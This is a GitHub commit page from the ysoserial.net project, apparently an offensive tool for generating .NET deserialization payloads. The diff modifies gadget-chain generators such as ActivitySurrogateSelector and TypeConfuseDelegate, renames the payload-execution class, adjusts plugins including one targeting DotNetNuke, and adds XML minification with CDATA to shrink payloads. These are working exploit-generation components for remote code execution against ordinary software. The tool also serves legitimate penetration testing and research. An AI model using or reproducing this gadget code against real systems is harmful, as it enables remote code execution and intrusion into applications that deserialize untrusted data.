Skip to content

Commit

Permalink
new features and bug fixing
Browse files Browse the repository at this point in the history
  • Loading branch information
Soroush Dalili committed Feb 5, 2020
1 parent 86b9cac commit 099af77
Show file tree
Hide file tree
Showing 27 changed files with 216 additions and 83 deletions.
8 changes: 4 additions & 4 deletions ysoserial/App.config
View file
@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="utf-8"?>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.1"/>
</startup>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral"/>
<bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0"/>
</dependentAssembly>
</assemblyBinding>
</runtime>
Expand Down
23 changes: 9 additions & 14 deletions ysoserial/ExploitClass.cs
View file
@@ -1,14 +1,10 @@
using System;
using System.Windows.Forms;

namespace ysoserial
{
class ExploitClass
 // ExploitClass was renamed to E to reduce the size a little bit
class E
{
public ExploitClass()
public E()
{
try
{
//try
//{
/* Payload code to be executed. Examples: */


Expand Down Expand Up @@ -37,10 +33,9 @@ public ExploitClass()
/* Causing a delay */
//System.Threading.Thread.Sleep(10000); // waits for 10 seconds

}
catch (Exception)
{
}
//}
//catch (Exception)
//{
//}
}
}
}
4 changes: 4 additions & 0 deletions ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
View file
Expand Up @@ -16,6 +16,10 @@ protected PayloadClassFromFile(SerializationInfo info, StreamingContext context)

public PayloadClassFromFile(string file)
{
if(file.StartsWith("cmd /c "))
{
file = file.Substring("cmd /c ".Length);
}
string[] files = file.Split(new[] { ';' }).Select(s => s.Trim()).ToArray();
CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");
CompilerParameters compilerParameters = new CompilerParameters();
Expand Down
8 changes: 6 additions & 2 deletions ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
View file
Expand Up @@ -34,7 +34,7 @@ public class PayloadClass : ISerializable
protected byte[] assemblyBytes;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes(typeof(ExploitClass).Assembly.Location);
this.assemblyBytes = File.ReadAllBytes(typeof(E).Assembly.Location);
}

protected PayloadClass(SerializationInfo info, StreamingContext context)
Expand All @@ -61,7 +61,7 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);

// DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
DesignerVerb verb = new DesignerVerb("XYZ", null);
DesignerVerb verb = new DesignerVerb("", null);
// Need to insert IDictionary using reflection.
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);

Expand All @@ -77,8 +77,12 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
Hashtable ht = new Hashtable();

// Add two entries to table.
/*
ht.Add(verb, "Hello");
ht.Add("Dummy", "Hello2");
*/
ht.Add(verb, "");
ht.Add("", "");

FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
Expand Down
2 changes: 1 addition & 1 deletion ysoserial/Generators/GenericGenerator.cs
View file
Expand Up @@ -102,7 +102,7 @@ public object Serialize(object cmdobj, string formatter, Boolean test, Boolean m
if (minify)
{
stream.Position = 0;
stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML);
stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML, true);
}

if (test)
Expand Down
1 change: 1 addition & 0 deletions ysoserial/Generators/PSObjectGenerator.cs
View file
Expand Up @@ -132,6 +132,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
if (minify)
{
// Could not be tested so it may not work here!
// also not sure if can use CDATA otherwise we could use the CDATA flag to save more space
clixml = Helpers.XMLMinifier.Minify(clixml, null, null);
}

Expand Down
4 changes: 4 additions & 0 deletions ysoserial/Generators/TypeConfuseDelegateGenerator.cs
View file
Expand Up @@ -56,6 +56,10 @@ public object TypeConfuseDelegateGadget(string cmd)
{
set.Add(splittedCMD[1]);
}
else
{
set.Add(""); // this is needed (as it accepts two args?)
}

FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
Expand Down
4 changes: 4 additions & 0 deletions ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
View file
Expand Up @@ -56,6 +56,10 @@ public object TypeConfuseDelegateGadget(string cmd)
{
set.Add(splittedCMD[1]);
}
else
{
set.Add(""); // this is needed (as it accepts two args?)
}

FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
Expand Down
2 changes: 1 addition & 1 deletion ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
View file
Expand Up @@ -183,7 +183,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool

if (minify)
{
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
Expand Down
2 changes: 1 addition & 1 deletion ysoserial/Generators/WindowsIdentityGenerator.cs
View file
Expand Up @@ -174,7 +174,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
";
if (minify)
{
payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
Expand Down
6 changes: 1 addition & 5 deletions ysoserial/Helpers/BFMinifier.cs
View file
@@ -1,8 +1,4 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;


namespace ysoserial.Helpers
{
Expand Down
5 changes: 1 addition & 4 deletions ysoserial/Helpers/CommandArgSplitter.cs
View file
@@ -1,10 +1,7 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class CommandArgSplitter
Expand Down
11 changes: 2 additions & 9 deletions ysoserial/Helpers/DevTest/SerializersHelper.cs
View file
@@ -1,25 +1,18 @@
using Microsoft.VisualStudio.Text.Formatting;
using System;
using System.Collections;
using System.Collections.Generic;
using System;
using System.Collections.Specialized;
using System.ComponentModel.Design;
using System.Data;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web.UI.WebControls;
using System.Windows;
using System.Windows.Data;
using System.Windows.Markup;
using System.Xml;
using System.Xml.Serialization;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers.DevTest
{
class SerializersHelper
Expand Down
11 changes: 4 additions & 7 deletions ysoserial/Helpers/JSONMinifier.cs
View file
@@ -1,12 +1,9 @@
using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class JSONMinifier
Expand All @@ -31,8 +28,6 @@ private static String JSONDirtyMatchReplaceMinifier(String jsonString, String[]
// replacing spaces between things like:
// Microsoft.IdentityModel, Version=3.5.0.0, PublicKeyToken=31bf3856ad364e35
// clr-namespace:System.Diagnostics; assembly=system
//jsonString = Regex.Replace(jsonString, @"[""'](\s*[^,;""']+\s*[,;]\s*)+([^,;""']+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });

jsonString = Regex.Replace(jsonString, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
// we do not want to remove spaces when two alphanumeric strings are next to each other
String finalVal = m.Value;
Expand All @@ -42,8 +37,10 @@ private static String JSONDirtyMatchReplaceMinifier(String jsonString, String[]
return finalVal;
});

// replacing not strong (loose) assembly names
// TODO: We are not replacing true with 1 and false with 0 at the moment due to the fact that none of the payloads in here has it
// This needs to be implemented in the future if we have such JSON objects in the future

// replacing not strong (loose) assembly names
if (LooseAssemblyNames != null)
{
foreach (String asmName in LooseAssemblyNames)
Expand Down
54 changes: 46 additions & 8 deletions ysoserial/Helpers/XMLMinifier.cs
View file
Expand Up @@ -4,7 +4,6 @@
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Xsl;

Expand Down Expand Up @@ -33,20 +32,30 @@ public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemb
}

public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
{
return Minify(xmlDocumentStream, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType, Boolean useCDATA)
{
StreamReader reader = new StreamReader(xmlDocumentStream);
string xmlDocument = reader.ReadToEnd();
xmlDocument = Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType);
xmlDocument = Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType, useCDATA);
byte[] byteArray = Encoding.UTF8.GetBytes(xmlDocument);
return new MemoryStream(byteArray);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
{
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None);
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
{
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType, Boolean useCDATA)
{
xmlDocument = XmlParserNamespaceMinifier(xmlDocument);

Expand All @@ -63,7 +72,7 @@ public static String Minify(String xmlDocument, String[] looseAssemblyNames, Str
}

xmlDocument = XmlXSLTMinifier(xmlDocument);
xmlDocument = XmlDirtyMatchReplaceMinifier(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray);
xmlDocument = XmlDirtyMatchReplaceMinifier(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, useCDATA);

return xmlDocument;
}
Expand Down Expand Up @@ -167,7 +176,7 @@ private static String ReplaceNamespaceNameAndValue(String xmlDocument, String Ol
}


private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, Boolean useCDATA)
{
// replacing spaces before > or /> in valid elements
xmlDocument = Regex.Replace(xmlDocument, @"(\<\/?[\w\:_]+([\s/]+[a-zA-Z0-9\.\-\:=_]+\s*=\s*(""[^""]*""|'[^']*'))*)\s+(\/?>)", "$1$+");
Expand All @@ -181,9 +190,6 @@ private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[]
// clr-namespace:System.Diagnostics; assembly=system
// { x:Type Diag:Process }
// Int32 Compare(System.String, System.String)

//xmlDocument = Regex.Replace(xmlDocument, @"[""'](\s*[^&,;""'<]+\s*[,;]\s*)+([^&,;""'<]+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });

xmlDocument = Regex.Replace(xmlDocument, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
// we do not want to remove spaces when two alphanumeric strings are next to each other
String finalVal = m.Value;
Expand Down Expand Up @@ -217,6 +223,38 @@ private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[]
}
}

if (useCDATA)
{
// at this point, we want to decode all HTML encodings of valid XML elements and use CDATA
// we assume we are not already in CDATA! (big assumption)
// if we really want to save space, we need to have around 4 encoded values but we also ignore that for now

string htmlEncodedPattern = @"(?<=>\s*)(\&lt;([\w\:_\-]+)[^<]+)(?=\s*<)";
Regex htmlEncodedRegEx = new Regex(htmlEncodedPattern, RegexOptions.Compiled);
MatchCollection htmlEncodedMatches = htmlEncodedRegEx.Matches(xmlDocument);

foreach (Match match in htmlEncodedMatches)
{
GroupCollection groups = match.Groups;
String htmlEncodedValue = groups[1].Value;
String newValue = System.Web.HttpUtility.HtmlDecode(htmlEncodedValue);

// now we can also minify this probably
try
{
newValue = Minify(newValue, null, null);
}
catch (Exception e)
{
//
}

xmlDocument = xmlDocument.Replace(htmlEncodedValue, "<![CDATA[" + newValue + "]]>");

}

}

return xmlDocument;
}

Expand Down
5 changes: 1 addition & 4 deletions ysoserial/Helpers/YamlDotNet.cs
View file
@@ -1,10 +1,7 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class YamlDotNet
Expand Down
2 changes: 1 addition & 1 deletion ysoserial/Plugins/AltserializationPlugin.cs
View file
Expand Up @@ -32,7 +32,7 @@ class AltserializationPlugin : Plugin
{"o|output=", "the output format (raw|base64).", v => format = v },
{"c|command=", "the command to be executed", v => command = v },
{"t|test", "whether to run payload locally. Default: false", v => test = v != null },
{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
//{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
};

public string Name()
Expand Down
5 changes: 5 additions & 0 deletions ysoserial/Plugins/ApplicationTrustPlugin.cs
View file
Expand Up @@ -89,6 +89,11 @@ public object Run(string[] args)
payloadValue = BitConverter.ToString(osf).Replace("-", string.Empty);
payload = String.Format(payload, payloadValue);

if (minify)
{
payload = Helpers.XMLMinifier.Minify(payload, null, null);
}

if (test)
{
// PoC on how it works in practice
Expand Down
2 changes: 1 addition & 1 deletion ysoserial/Plugins/ClipboardPlugin.cs
View file
Expand Up @@ -34,7 +34,7 @@ class ClipboardPlugin : Plugin
{"F|format=", "the object format: Csv, DeviceIndependentBitmap, DataInterchangeFormat, PenData, RiffAudio, WindowsForms10PersistentObject, System.String, SymbolicLink, TaggedImageFileFormat, WaveAudio. Default: System.String", v => format = v },
{"c|command=", "the command to be executed", v => command = v },
{"t|test", "whether to run payload locally. Default: false", v => test = v != null },
{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
//{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
};

public string Name()
Expand Down
6 changes: 6 additions & 0 deletions ysoserial/Plugins/DotNetNukePlugin.cs
View file
Expand Up @@ -82,6 +82,12 @@ public object Run(string[] args)
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}

if (minify)
{
payload = Helpers.XMLMinifier.Minify(payload, null, null);
}

return payload;

}
Expand Down

0 comments on commit 099af77

Please sign in to comment.